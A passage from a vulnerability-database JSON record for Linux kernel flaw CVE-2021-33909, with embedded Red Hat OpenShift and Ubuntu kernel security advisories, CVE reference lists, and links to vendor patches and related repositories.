operator] Unable to re-register an SNO instance if deleting CRDs during install\n1966654 - Alertmanager PDB is not created, but Prometheus UWM is\n1966672 - Add Sprint 201 translations\n1966675 - Admin console string updates\n1966677 - Change comma to semicolon\n1966683 - Translation bugs from Sprint 201 files\n1966684 - Verify \"Creating snapshot for claim \u003c1\u003e{pvcName}\u003c/1\u003e\" displays correctly\n1966697 - Garbage collector logs every interval - move to debug level\n1966717 - include full timestamps in the logs\n1966759 - Enable downstream plugin for Operator SDK\n1966795 - [tests] Release 4.7 broken due to the usage of wrong OCS version\n1966813 - \"Replacing an unhealthy etcd member whose node is not ready\" procedure results in new etcd pod in CrashLoopBackOff\n1966862 - vsphere IPI - local dns prepender is not prepending nameserver 127.0.0.1\n1966892 - [master] [Assisted-4.8][SNO] SNO node cannot transition into \"Writing image to disk\" from \"Waiting for bootkub[e\"\n1966952 - [4.8.0] [Assisted-4.8][SNO][Dual Stack] DHCPv6 settings \"ipv6.dhcp-duid=ll\" missing from dual stack install\n1967104 - [4.8.0] InfraEnv ctrl: log the amount of NMstate Configs baked into the image\n1967126 - [4.8.0] [DOC] KubeAPI docs should clarify that the InfraEnv Spec pullSecretRef is currently ignored\n1967197 - 404 errors loading some i18n namespaces\n1967207 - Getting started card: console customization resources link shows other resources\n1967208 - Getting started card should use semver library for parsing the version instead of string manipulation\n1967234 - Console is continuously polling for ConsoleLink acm-link\n1967275 - Awkward wrapping in getting started dashboard card\n1967276 - Help menu tooltip overlays dropdown\n1967398 - authentication operator still uses previous deleted pod ip rather than the new created pod ip to do health check\n1967403 - (release-4.8) Increase workloads fingerprint gatherer pods limit\n1967423 - [master] clusterDeployments controller should take 1m to reqeueue when failing with AddOpenshiftVersion\n1967444 - openshift-local-storage pods found with invalid priority class, should be openshift-user-critical or begin with system- while running e2e tests\n1967531 - the ccoctl tool should extend MaxItems when listRoles, the default value 100 is a little small\n1967578 - [4.8.0] clusterDeployments controller should take 1m to reqeueue when failing with AddOpenshiftVersion\n1967591 - The ManagementCPUsOverride admission plugin should not mutate containers with the limit\n1967595 - Fixes the remaining lint issues\n1967614 - prometheus-k8s pods can\u0027t be scheduled due to volume node affinity conflict\n1967623 - [OCPonRHV] - ./openshift-install installation with install-config doesn\u0027t work if ovirt-config.yaml doesn\u0027t exist and user should fill the FQDN URL\n1967625 - Add OpenShift Dockerfile for cloud-provider-aws\n1967631 - [4.8.0] Cluster install failed due to timeout while \"Waiting for control plane\"\n1967633 - [4.8.0] [Assisted-4.8][SNO] SNO node cannot transition into \"Writing image to disk\" from \"Waiting for bootkube\"\n1967639 - Console whitescreens if user preferences fail to load\n1967662 - machine-api-operator should not use deprecated \"platform\" field in infrastructures.config.openshift.io\n1967667 - Add Sprint 202 Round 1 translations\n1967713 - Insights widget shows invalid link to the OCM\n1967717 - Insights Advisor widget is missing a description paragraph and contains deprecated naming\n1967745 - When setting DNS node placement by toleration to not tolerate master node, effect value should not allow string other than \"NoExecute\"\n1967803 - should update to 7.5.5 for grafana resources version label\n1967832 - Add more tests for periodic.go\n1967833 - Add tasks pool to tasks_processing\n1967842 - Production logs are spammed on \"OCS requirements validation status Insufficient hosts to deploy OCS. A minimum of 3 hosts is required to deploy OCS\"\n1967843 - Fix null reference to messagesToSearch in gather_logs.go\n1967902 - [4.8.0] Assisted installer chrony manifests missing index numberring\n1967933 - Network-Tools debug scripts not working as expected\n1967945 - [4.8.0] [assisted operator] Assisted Service Postgres crashes msg: \"mkdir: cannot create directory \u0027/var/lib/pgsql/data/userdata\u0027: Permission denied\"\n1968019 - drain timeout and pool degrading period is too short\n1968067 - [master] Agent validation not including reason for being insufficient\n1968168 - [4.8.0] KubeAPI - keep day1 after cluster is successfully installed\n1968175 - [4.8.0] Agent validation not including reason for being insufficient\n1968373 - [4.8.0] BMAC re-attaches installed node on ISO regeneration\n1968385 - [4.8.0] Infra env require pullSecretRef although it shouldn\u0027t be required\n1968435 - [4.8.0] Unclear message in case of missing clusterImageSet\n1968436 - Listeners timeout updated to remain using default value\n1968449 - [4.8.0] Wrong Install-config override documentation\n1968451 - [4.8.0] Garbage collector not cleaning up directories of removed clusters\n1968452 - [4.8.0] [doc] \"Mirror Registry Configuration\" doc section needs clarification of functionality and limitations\n1968454 - [4.8.0] backend events generated with wrong namespace for agent\n1968455 - [4.8.0] Assisted Service operator\u0027s controllers are starting before the base service is ready\n1968515 - oc should set user-agent when talking with registry\n1968531 - Sync upstream 1.8.0 downstream\n1968558 - [sig-cli] oc adm storage-admin [Suite:openshift/conformance/parallel] doesn\u0027t clean up properly\n1968567 - [OVN] Egress router pod not running and openshift.io/scc is restricted\n1968625 - Pods using sr-iov interfaces failign to start for Failed to create pod sandbox\n1968700 - catalog-operator crashes when status.initContainerStatuses[].state.waiting is nil\n1968701 - Bare metal IPI installation is failed due to worker inspection failure\n1968754 - CI: e2e-metal-ipi-upgrade failing on KubeletHasDiskPressure, which triggers machine-config RequiredPoolsFailed\n1969212 - [FJ OCP4.8 Bug - PUBLIC VERSION]: Masters repeat reboot every few minutes during workers provisioning\n1969284 - Console Query Browser: Can\u0027t reset zoom to fixed time range after dragging to zoom\n1969315 - [4.8.0] BMAC doesn\u0027t check if ISO Url changed before queuing BMH for reconcile\n1969352 - [4.8.0] Creating BareMetalHost without the \"inspect.metal3.io\" does not automatically add it\n1969363 - [4.8.0] Infra env should show the time that ISO was generated. \n1969367 - [4.8.0] BMAC should wait for an ISO to exist for 1 minute before using it\n1969386 - Filesystem\u0027s Utilization doesn\u0027t show in VM overview tab\n1969397 - OVN bug causing subports to stay DOWN fails installations\n1969470 - [4.8.0] Misleading error in case of install-config override bad input\n1969487 - [FJ OCP4.8 Bug]: Avoid always do delete_configuration clean step\n1969525 - Replace golint with revive\n1969535 - Topology edit icon does not link correctly when branch name contains slash\n1969538 - Install a VolumeSnapshotClass by default on CSI Drivers that support it\n1969551 - [4.8.0] Assisted service times out on GetNextSteps due to `oc adm release info` taking too long\n1969561 - Test \"an end user can use OLM can subscribe to the operator\" generates deprecation alert\n1969578 - installer: accesses v1beta1 RBAC APIs and causes APIRemovedInNextReleaseInUse to fire\n1969599 - images without registry are being prefixed with registry.hub.docker.com instead of docker.io\n1969601 - manifest for networks.config.openshift.io CRD uses deprecated apiextensions.k8s.io/v1beta1\n1969626 - Portfoward stream cleanup can cause kubelet to panic\n1969631 - EncryptionPruneControllerDegraded: etcdserver: request timed out\n1969681 - MCO: maxUnavailable of ds/machine-config-daemon does not get updated due to missing resourcemerge check\n1969712 - [4.8.0] Assisted service reports a malformed iso when we fail to download the base iso\n1969752 - [4.8.0] [assisted operator] Installed Clusters are missing DNS setups\n1969773 - [4.8.0] Empty cluster name on handleEnsureISOErrors log after applying InfraEnv.yaml\n1969784 - WebTerminal widget should send resize events\n1969832 - Applying a profile with multiple inheritance where parents include a common ancestor fails\n1969891 - Fix rotated pipelinerun status icon issue in safari\n1969900 - Test files should not use deprecated APIs that will trigger APIRemovedInNextReleaseInUse\n1969903 - Provisioning a large number of hosts results in an unexpected delay in hosts becoming available\n1969951 - Cluster local doesn\u0027t work for knative services created from dev console\n1969969 - ironic-rhcos-downloader container uses and old base image\n1970062 - ccoctl does not work with STS authentication\n1970068 - ovnkube-master logs \"Failed to find node ips for gateway\" error\n1970126 - [4.8.0] Disable \"metrics-events\" when deploying using the operator\n1970150 - master pool is still upgrading when machine config reports level / restarts on osimageurl change\n1970262 - [4.8.0] Remove Agent CRD Status fields not needed\n1970265 - [4.8.0] Add State and StateInfo to DebugInfo in ACI and Agent CRDs\n1970269 - [4.8.0] missing role in agent CRD\n1970271 - [4.8.0] Add ProgressInfo to Agent and AgentClusterInstalll CRDs\n1970381 - Monitoring dashboards: Custom time range inputs should retain their values\n1970395 - [4.8.0] SNO with AI/operator - kubeconfig secret is not created until the spoke is deployed\n1970401 - [4.8.0] AgentLabelSelector is required yet not supported\n1970415 - SR-IOV Docs needs documentation for disabling port security on a network\n1970470 - Add pipeline annotation to Secrets which are created for a private repo\n1970494 - [4.8.0] Missing value-filling of log line in assisted-service operator pod\n1970624 - 4.7-\u003e4.8 updates: AggregatedAPIDown for v1beta1.metrics.k8s.io\n1970828 - \"500 Internal Error\" for all openshift-monitoring routes\n1970975 - 4.7 -\u003e 4.8 upgrades on AWS take longer than expected\n1971068 - Removing invalid AWS instances from the CF templates\n1971080 - 4.7-\u003e4.8 CI: KubePodNotReady due to MCD\u0027s 5m sleep between drain attempts\n1971188 - Web Console does not show OpenShift Virtualization Menu with VirtualMachine CRDs of version v1alpha3 !\n1971293 - [4.8.0] Deleting agent from one namespace causes all agents with the same name to be deleted from all namespaces\n1971308 - [4.8.0] AI KubeAPI AgentClusterInstall confusing \"Validated\" condition about VIP not matching machine network\n1971529 - [Dummy bug for robot] 4.7.14 upgrade to 4.8 and then downgrade back to 4.7.14 doesn\u0027t work - clusteroperator/kube-apiserver is not upgradeable\n1971589 - [4.8.0] Telemetry-client won\u0027t report metrics in case the cluster was installed using the assisted operator\n1971630 - [4.8.0] ACM/ZTP with Wan emulation fails to start the agent service\n1971632 - [4.8.0] ACM/ZTP with Wan emulation, several clusters fail to step past discovery\n1971654 - [4.8.0] InfraEnv controller should always requeue for backend response HTTP StatusConflict (code 409)\n1971739 - Keep /boot RW when kdump is enabled\n1972085 - [4.8.0] Updating configmap within AgentServiceConfig is not logged properly\n1972128 - ironic-static-ip-manager container still uses 4.7 base image\n1972140 - [4.8.0] ACM/ZTP with Wan emulation, SNO cluster installs do not show as installed although they are\n1972167 - Several operators degraded because Failed to create pod sandbox when installing an sts cluster\n1972213 - Openshift Installer| UEFI mode | BM hosts have BIOS halted\n1972262 - [4.8.0] \"baremetalhost.metal3.io/detached\" uses boolean value where string is expected\n1972426 - Adopt failure can trigger deprovisioning\n1972436 - [4.8.0] [DOCS] AgentServiceConfig examples in operator.md doc should each contain databaseStorage + filesystemStorage\n1972526 - [4.8.0] clusterDeployments controller should send an event to InfraEnv for backend cluster registration\n1972530 - [4.8.0] no indication for missing debugInfo in AgentClusterInstall\n1972565 - performance issues due to lost node, pods taking too long to relaunch\n1972662 - DPDK KNI modules need some additional tools\n1972676 - Requirements for authenticating kernel modules with X.509\n1972687 - Using bound SA tokens causes causes failures to /apis/authorization.openshift.io/v1/clusterrolebindings\n1972690 - [4.8.0] infra-env condition message isn\u0027t informative in case of missing pull secret\n1972702 - [4.8.0] Domain dummy.com (not belonging to Red Hat) is being used in a default configuration\n1972768 - kube-apiserver setup fail while installing SNO due to port being used\n1972864 - New `local-with-fallback` service annotation does not preserve source IP\n1973018 - Ironic rhcos downloader breaks image cache in upgrade process from 4.7 to 4.8\n1973117 - No storage class is installed, OCS and CNV installations fail\n1973233 - remove kubevirt images and references\n1973237 - RHCOS-shipped stalld systemd units do not use SCHED_FIFO to run stalld. \n1973428 - Placeholder bug for OCP 4.8.0 image release\n1973667 - [4.8] NetworkPolicy tests were mistakenly marked skipped\n1973672 - fix ovn-kubernetes NetworkPolicy 4.7-\u003e4.8 upgrade issue\n1973995 - [Feature:IPv6DualStack] tests are failing in dualstack\n1974414 - Uninstalling kube-descheduler clusterkubedescheduleroperator.4.6.0-202106010807.p0.git.5db84c5 removes some clusterrolebindings\n1974447 - Requirements for nvidia GPU driver container for driver toolkit\n1974677 - [4.8.0] KubeAPI CVO progress is not available on CR/conditions only in events. \n1974718 - Tuned net plugin fails to handle net devices with n/a value for a channel\n1974743 - [4.8.0] All resources not being cleaned up after clusterdeployment deletion\n1974746 - [4.8.0] File system usage not being logged appropriately\n1974757 - [4.8.0] Assisted-service deployed on an IPv6 cluster installed with proxy: agentclusterinstall shows error pulling an image from quay. \n1974773 - Using bound SA tokens causes fail to query cluster resource especially in a sts cluster\n1974839 - CVE-2021-29059 nodejs-is-svg: Regular expression denial of service if the application is provided and checks a crafted invalid SVG string\n1974850 - [4.8] coreos-installer failing Execshield\n1974931 - [4.8.0] Assisted Service Operator should be Infrastructure Operator for Red Hat OpenShift\n1974978 - 4.8.0.rc0 upgrade hung, stuck on DNS clusteroperator progressing\n1975155 - Kubernetes service IP cannot be accessed for rhel worker\n1975227 - [4.8.0] KubeAPI Move conditions consts to CRD types\n1975360 - [4.8.0] [master] timeout on kubeAPI subsystem test: SNO full install and validate MetaData\n1975404 - [4.8.0] Confusing behavior when multi-node spoke workers present when only controlPlaneAgents specified\n1975432 - Alert InstallPlanStepAppliedWithWarnings does not resolve\n1975527 - VMware UPI is configuring static IPs via ignition rather than afterburn\n1975672 - [4.8.0] Production logs are spammed on \"Found unpreparing host: id 08f22447-2cf1-a107-eedf-12c7421f7380 status insufficient\"\n1975789 - worker nodes rebooted when we simulate a case where the api-server is down\n1975938 - gcp-realtime: e2e test failing [sig-storage] Multi-AZ Cluster Volumes should only be allowed to provision PDs in zones where nodes exist [Suite:openshift/conformance/parallel] [Suite:k8s]\n1975964 - 4.7 nightly upgrade to 4.8 and then downgrade back to 4.7 nightly doesn\u0027t work -  ingresscontroller \"default\" is degraded\n1976079 - [4.8.0] Openshift Installer| UEFI mode | BM hosts have BIOS halted\n1976263 - [sig-cli] oc adm must-gather runs successfully for audit logs [Suite:openshift/conformance/parallel]\n1976376 - disable jenkins client plugin test whose Jenkinsfile references master branch openshift/origin artifacts\n1976590 - [Tracker] [SNO][assisted-operator][nmstate] Bond Interface is down when booting from the discovery ISO\n1977233 - [4.8] Unable to authenticate against IDP after upgrade to 4.8-rc.1\n1977351 - CVO pod skipped by workload partitioning with incorrect error stating cluster is not SNO\n1977352 - [4.8.0] [SNO] No DNS to cluster API from assisted-installer-controller\n1977426 - Installation of OCP 4.6.13 fails when teaming interface is used with OVNKubernetes\n1977479 - CI failing on firing CertifiedOperatorsCatalogError due to slow livenessProbe responses\n1977540 - sriov webhook not worked when upgrade from 4.7 to 4.8\n1977607 - [4.8.0] Post making changes to AgentServiceConfig assisted-service operator is not detecting the change and redeploying assisted-service pod\n1977924 - Pod fails to run when a custom SCC with a specific set of volumes is used\n1980788 - NTO-shipped stalld can segfault\n1981633 - enhance service-ca injection\n1982250 - Performance Addon Operator fails to install after catalog source becomes ready\n1982252 - olm Operator is in CrashLoopBackOff state with error \"couldn\u0027t cleanup cross-namespace ownerreferences\"\n\n5. References:\n\nhttps://access.redhat.com/security/cve/CVE-2016-2183\nhttps://access.redhat.com/security/cve/CVE-2020-7774\nhttps://access.redhat.com/security/cve/CVE-2020-15106\nhttps://access.redhat.com/security/cve/CVE-2020-15112\nhttps://access.redhat.com/security/cve/CVE-2020-15113\nhttps://access.redhat.com/security/cve/CVE-2020-15114\nhttps://access.redhat.com/security/cve/CVE-2020-15136\nhttps://access.redhat.com/security/cve/CVE-2020-26160\nhttps://access.redhat.com/security/cve/CVE-2020-26541\nhttps://access.redhat.com/security/cve/CVE-2020-28469\nhttps://access.redhat.com/security/cve/CVE-2020-28500\nhttps://access.redhat.com/security/cve/CVE-2020-28852\nhttps://access.redhat.com/security/cve/CVE-2021-3114\nhttps://access.redhat.com/security/cve/CVE-2021-3121\nhttps://access.redhat.com/security/cve/CVE-2021-3516\nhttps://access.redhat.com/security/cve/CVE-2021-3517\nhttps://access.redhat.com/security/cve/CVE-2021-3518\nhttps://access.redhat.com/security/cve/CVE-2021-3520\nhttps://access.redhat.com/security/cve/CVE-2021-3537\nhttps://access.redhat.com/security/cve/CVE-2021-3541\nhttps://access.redhat.com/security/cve/CVE-2021-3636\nhttps://access.redhat.com/security/cve/CVE-2021-20206\nhttps://access.redhat.com/security/cve/CVE-2021-20271\nhttps://access.redhat.com/security/cve/CVE-2021-20291\nhttps://access.redhat.com/security/cve/CVE-2021-21419\nhttps://access.redhat.com/security/cve/CVE-2021-21623\nhttps://access.redhat.com/security/cve/CVE-2021-21639\nhttps://access.redhat.com/security/cve/CVE-2021-21640\nhttps://access.redhat.com/security/cve/CVE-2021-21648\nhttps://access.redhat.com/security/cve/CVE-2021-22133\nhttps://access.redhat.com/security/cve/CVE-2021-23337\nhttps://access.redhat.com/security/cve/CVE-2021-23362\nhttps://access.redhat.com/security/cve/CVE-2021-23368\nhttps://access.redhat.com/security/cve/CVE-2021-23382\nhttps://access.redhat.com/security/cve/CVE-2021-25735\nhttps://access.redhat.com/security/cve/CVE-2021-25737\nhttps://access.redhat.com/security/cve/CVE-2021-26539\nhttps://access.redhat.com/security/cve/CVE-2021-26540\nhttps://access.redhat.com/security/cve/CVE-2021-27292\nhttps://access.redhat.com/security/cve/CVE-2021-28092\nhttps://access.redhat.com/security/cve/CVE-2021-29059\nhttps://access.redhat.com/security/cve/CVE-2021-29622\nhttps://access.redhat.com/security/cve/CVE-2021-32399\nhttps://access.redhat.com/security/cve/CVE-2021-33034\nhttps://access.redhat.com/security/cve/CVE-2021-33194\nhttps://access.redhat.com/security/cve/CVE-2021-33909\nhttps://access.redhat.com/security/updates/classification/#moderate\n\n6. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2021 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIVAwUBYQCOF9zjgjWX9erEAQjsEg/+NSFQdRcZpqA34LWRtxn+01y2MO0WLroQ\nd4o+3h0ECKYNRFKJe6n7z8MdmPpvV2uNYN0oIwidTESKHkFTReQ6ZolcV/sh7A26\nZ7E+hhpTTObxAL7Xx8nvI7PNffw3CIOZSpnKws5TdrwuMkH5hnBSSZntP5obp9Vs\nImewWWl7CNQtFewtXbcmUojNzIvU1mujES2DTy2ffypLoOW6kYdJzyWubigIoR6h\ngep9HKf1X4oGPuDNF5trSdxKwi6W68+VsOA25qvcNZMFyeTFhZqowot/Jh1HUHD8\nTWVpDPA83uuExi/c8tE8u7VZgakWkRWcJUsIw68VJVOYGvpP6K/MjTpSuP2itgUX\nX//1RGQM7g6sYTCSwTOIrMAPbYH0IMbGDjcS4fSZcfg6c+WJnEpZ72ZgjHZV8mxb\n1BtQSs2lil48/cwDKM0yMO2nYsKiz4DCCx2W5izP0rLwNA8Hvqh9qlFgkxJWWOvA\nmtBCelB0E74qrE4NXbX+MIF7+ZQKjd1evE91/VWNs0FLR/xXdP3C5ORLU3Fag0G/\n0oTV73NdxP7IXVAdsECwU2AqS9ne1y01zJKtd7hq7H/wtkbasqCNq5J7HikJlLe6\ndpKh5ZRQzYhGeQvho9WQfz/jd4HZZTcB6wxrWubbd05bYt/i/0gau90LpuFEuSDx\n+bLvJlpGiMg=\n=NJcM\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://listman.redhat.com/mailman/listinfo/rhsa-announce\n. Linux kernel vulnerabilities\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n-   Ubuntu 20.04 LTS\n-   Ubuntu 18.04 LTS\n-   Ubuntu 16.04 ESM\n-   Ubuntu 14.04 ESM\n\nSummary\n\nSeveral security issues were fixed in the kernel. An attacker in a guest VM could use\nthis to write to portions of the host\u2019s physical memory. (CVE-2021-3653)\n\nMaxim Levitsky and Paolo Bonzini discovered that the KVM hypervisor\nimplementation for AMD processors in the Linux kernel allowed a guest VM\nto disable restrictions on VMLOAD/VMSAVE in a nested guest. An attacker\nin a guest VM could use this to read or write portions of the host\u2019s\nphysical memory. (CVE-2021-3656)\n\nAndy Nguyen discovered that the netfilter subsystem in the Linux kernel\ncontained an out-of-bounds write in its setsockopt() implementation. A\nlocal attacker could use this to cause a denial of service (system\ncrash) or possibly execute arbitrary code. (CVE-2021-22555)\n\nIt was discovered that the virtual file system implementation in the\nLinux kernel contained an unsigned to signed integer conversion error. A\nlocal attacker could use this to cause a denial of service (system\ncrash) or execute arbitrary code. (CVE-2021-33909)\n\nUpdate instructions\n\nThe problem can be corrected by updating your kernel livepatch to the\nfollowing versions:\n\nUbuntu 20.04 LTS\n    gcp - 81.1\n    generic - 81.1\n    gke - 81.1\n    gkeop - 81.1\n    lowlatency - 81.1\n\nUbuntu 18.04 LTS\n    generic - 81.1\n    gke - 81.1\n    gkeop - 81.1\n    lowlatency - 81.1\n    oem - 81.1\n\nUbuntu 16.04 ESM\n    generic - 81.1\n    lowlatency - 81.1\n\nUbuntu 14.04 ESM\n    generic - 81.1\n    lowlatency - 81.1\n\nSupport Information\n\nKernels older than the levels listed below do not receive livepatch\nupdates. If you are running a kernel version earlier than the one listed\nbelow, please upgrade your kernel as soon as possible. \n\nUbuntu 20.04 LTS\n    linux-aws - 5.4.0-1009\n    linux-azure - 5.4.0-1010\n    linux-gcp - 5.4.0-1009\n    linux-gke - 5.4.0-1033\n    linux-gkeop - 5.4.0-1009\n    linux-oem - 5.4.0-26\n    linux - 5.4.0-26\n\nUbuntu 18.04 LTS\n    linux-aws - 4.15.0-1054\n    linux-gke-4.15 - 4.15.0-1076\n    linux-gke-5.4 - 5.4.0-1009\n    linux-gkeop-5.4 - 5.4.0-1007\n    linux-hwe-5.4 - 5.4.0-26\n    linux-oem - 4.15.0-1063\n    linux - 4.15.0-69\n\nUbuntu 16.04 ESM\n    linux-aws - 4.4.0-1098\n    linux-azure - 4.15.0-1063\n    linux-azure - 4.15.0-1078\n    linux-hwe - 4.15.0-69\n    linux - 4.4.0-168\n    linux - 4.4.0-211\n\nUbuntu 14.04 ESM\n    linux-lts-xenial - 4.4.0-168\n\nReferences\n\n-   CVE-2021-3653\n-   CVE-2021-3656\n-   CVE-2021-22555\n-   CVE-2021-33909\n\n\n\n-- \nubuntu-security-announce mailing list\nubuntu-security-announce@lists.ubuntu.com\nModify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2021-33909"
      },
      {
        "db": "VULMON",
        "id": "CVE-2021-33909"
      },
      {
        "db": "PACKETSTORM",
        "id": "163590"
      },
      {
        "db": "PACKETSTORM",
        "id": "163595"
      },
      {
        "db": "PACKETSTORM",
        "id": "163601"
      },
      {
        "db": "PACKETSTORM",
        "id": "163606"
      },
      {
        "db": "PACKETSTORM",
        "id": "163608"
      },
      {
        "db": "PACKETSTORM",
        "id": "163619"
      },
      {
        "db": "PACKETSTORM",
        "id": "163568"
      },
      {
        "db": "PACKETSTORM",
        "id": "163682"
      },
      {
        "db": "PACKETSTORM",
        "id": "163690"
      },
      {
        "db": "PACKETSTORM",
        "id": "164155"
      }
    ],
    "trust": 1.89
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2021-33909",
        "trust": 2.1
      },
      {
        "db": "PACKETSTORM",
        "id": "164155",
        "trust": 1.1
      },
      {
        "db": "PACKETSTORM",
        "id": "163671",
        "trust": 1.0
      },
      {
        "db": "PACKETSTORM",
        "id": "163621",
        "trust": 1.0
      },
      {
        "db": "PACKETSTORM",
        "id": "165477",
        "trust": 1.0
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2021/07/22/7",
        "trust": 1.0
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2021/09/17/4",
        "trust": 1.0
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2021/09/21/1",
        "trust": 1.0
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2021/08/25/10",
        "trust": 1.0
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2021/09/17/2",
        "trust": 1.0
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2021/07/20/1",
        "trust": 1.0
      },
      {
        "db": "VULMON",
        "id": "CVE-2021-33909",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "163590",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "163595",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "163601",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "163606",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "163608",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "163619",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "163568",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "163682",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "163690",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2021-33909"
      },
      {
        "db": "PACKETSTORM",
        "id": "163590"
      },
      {
        "db": "PACKETSTORM",
        "id": "163595"
      },
      {
        "db": "PACKETSTORM",
        "id": "163601"
      },
      {
        "db": "PACKETSTORM",
        "id": "163606"
      },
      {
        "db": "PACKETSTORM",
        "id": "163608"
      },
      {
        "db": "PACKETSTORM",
        "id": "163619"
      },
      {
        "db": "PACKETSTORM",
        "id": "163568"
      },
      {
        "db": "PACKETSTORM",
        "id": "163682"
      },
      {
        "db": "PACKETSTORM",
        "id": "163690"
      },
      {
        "db": "PACKETSTORM",
        "id": "164155"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-33909"
      }
    ]
  },
  "id": "VAR-202107-1361",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VARIoT devices database",
        "id": null
      }
    ],
    "trust": 0.21111111
  },
  "last_update_date": "2024-07-23T19:28:07.610000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Amazon Linux AMI: ALAS-2021-1524",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2021-1524"
      },
      {
        "title": "Debian Security Advisories: DSA-4941-1 linux -- security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=fb9b5f5cc430f484f4420a11b7b87136"
      },
      {
        "title": "Amazon Linux 2: ALAS2LIVEPATCH-2021-055",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2\u0026qid=alas2livepatch-2021-055"
      },
      {
        "title": "Amazon Linux 2: ALAS2KERNEL-5.10-2022-003",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2\u0026qid=alas2kernel-5.10-2022-003"
      },
      {
        "title": "Amazon Linux 2: ALAS2-2021-1691",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2\u0026qid=alas2-2021-1691"
      },
      {
        "title": "Amazon Linux 2: ALAS2LIVEPATCH-2021-057",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2\u0026qid=alas2livepatch-2021-057"
      },
      {
        "title": "Amazon Linux 2: ALAS2LIVEPATCH-2021-056",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2\u0026qid=alas2livepatch-2021-056"
      },
      {
        "title": "Arch Linux Advisories: [ASA-202107-48] linux: privilege escalation",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_advisories\u0026qid=asa-202107-48"
      },
      {
        "title": "Arch Linux Advisories: [ASA-202107-50] linux-hardened: privilege escalation",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_advisories\u0026qid=asa-202107-50"
      },
      {
        "title": "Amazon Linux 2: ALAS2KERNEL-5.4-2022-005",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2\u0026qid=alas2kernel-5.4-2022-005"
      },
      {
        "title": "Amazon Linux 2: ALAS2LIVEPATCH-2021-058",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2\u0026qid=alas2livepatch-2021-058"
      },
      {
        "title": "Amazon Linux 2: ALAS2LIVEPATCH-2021-059",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2\u0026qid=alas2livepatch-2021-059"
      },
      {
        "title": "Arch Linux Advisories: [ASA-202107-49] linux-zen: privilege escalation",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_advisories\u0026qid=asa-202107-49"
      },
      {
        "title": "Arch Linux Advisories: [ASA-202107-51] linux-lts: privilege escalation",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_advisories\u0026qid=asa-202107-51"
      },
      {
        "title": "Arch Linux Issues: ",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_issues\u0026qid=cve-2021-33909 log"
      },
      {
        "title": "Siemens Security Advisories: Siemens Security Advisory",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=siemens_security_advisories\u0026qid=ec6577109e640dac19a6ddb978afe82d"
      },
      {
        "title": "LinuxVulnerabilities",
        "trust": 0.1,
        "url": "https://github.com/gitezri/linuxvulnerabilities "
      },
      {
        "title": "",
        "trust": 0.1,
        "url": "https://github.com/live-hack-cve/cve-2021-33909 "
      },
      {
        "title": "CVE-2021-33909",
        "trust": 0.1,
        "url": "https://github.com/amiahuman/cve-2021-33909 "
      },
      {
        "title": "CVE-2021-33909",
        "trust": 0.1,
